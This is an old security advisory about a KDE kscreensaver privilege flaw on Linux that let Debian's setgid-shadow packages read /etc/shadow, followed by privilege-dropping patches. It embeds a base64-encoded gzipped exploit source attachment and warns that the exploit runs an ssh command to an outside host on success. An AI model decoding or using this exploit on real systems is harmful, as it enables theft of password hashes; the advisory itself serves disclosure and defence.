COMMAND

    kde

SYSTEMS AFFECTED

    Linux

PROBLEM

    Catalin Mitrofan  found vulnerability  in KDE  and posted exploit.
    The kde packages done by  debian were affected by the  kde exploit
    this way:   they were not  setuid root, but  setgid shadow. so  it
    could be possible to read /etc/shadow, but not get root rights.
    DO NOT USE THIS EXPLOIT  WITHOUT MODIFYING IT. THE THING  ATTEMPTS
    TO RUN 'ssh pentagon.usa.gov -v' IF THE EXPLOIT SUCCEEDS, ALTHOUGH
    THAT HOST DOES NOT EXIST.

    ---490605465-493702262-895346977=:4318
    Content-Type: APPLICATION/x-gunzip; name="kde.c.gz"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.3.96.980516222937.4318B@lspvs.sorosis.ro>
    Content-Description:

    H4sICGjnXTUAA2tkZS5jAFPOzEvOKU1JVbApLknJzNfLsOMqy89MUchNzMzT
    0OSq5uIsKC1JzSvTUIqwnTAKRsEoGAWjYBSMghEJOp/93z/QbhgFo4AeILTz
    6YYwG6ES9g1CL77+//8/zvDABhPGY52fO79vYGc8bnCgg919AytQwNwdCDbw
    g1idP0FsgwOd7J2/NnCfbdBPyszTL86oQDa3uDhDoSg/v0ShIDWvJDE9P0+v
    tDhRLz2/TEG3TEnTGtHk9vD3dbU1/Pt/f+IoRsHgUEqtSE3O0VDSzy8o0c9O
    SQWHdHZOfnK2ko4SlDYAqqsFALQHt8PjDAAA
    ---490605465-493702262-895346977=:4318--

SOLUTION

    Remove suid  bit, apply  latest version  if available  or apply at
    least patch to be safe:

    #for kde beta 3 and kde beta 4
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -206,6 +206,14 @@

     int main( int argc, char *argv[] )
     {
    +       initPasswd();
    +
    +       if (getgid() != getegid())
    +               setegid(getgid());
    +
    +       if (geteuid() != getuid())
    +               seteuid(getuid());
    +
            Window saveWin;
            int timeout = 600;
            ProgramName = argv[0];
    #for kde beta 4:
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -286,11 +294,6 @@
                    }
                i++;
            }
    -
    -       initPasswd();
    -       // drop root privileges before we do anything important
    -       setuid(getuid());
    -

            if ( mode == MODE_INSTALL )
            {
    #for kde beta 3:
    --- kdebase/kscreensaver/main.cpp.sec   Sat Jan 10 01:13:31 1998
    +++ kdebase/kscreensaver/main.cpp       Mon Feb 23 19:33:45 1998
    @@ -286,8 +294,6 @@
                    }
                i++;
            }
    -
    -       initPasswd();

            if ( mode == MODE_INSTALL )
            {

    This is  used by  klock and  all *.kss  files.   If you  have PAM,
    kscreensaver need not be suid, the patch is a bit long (6K).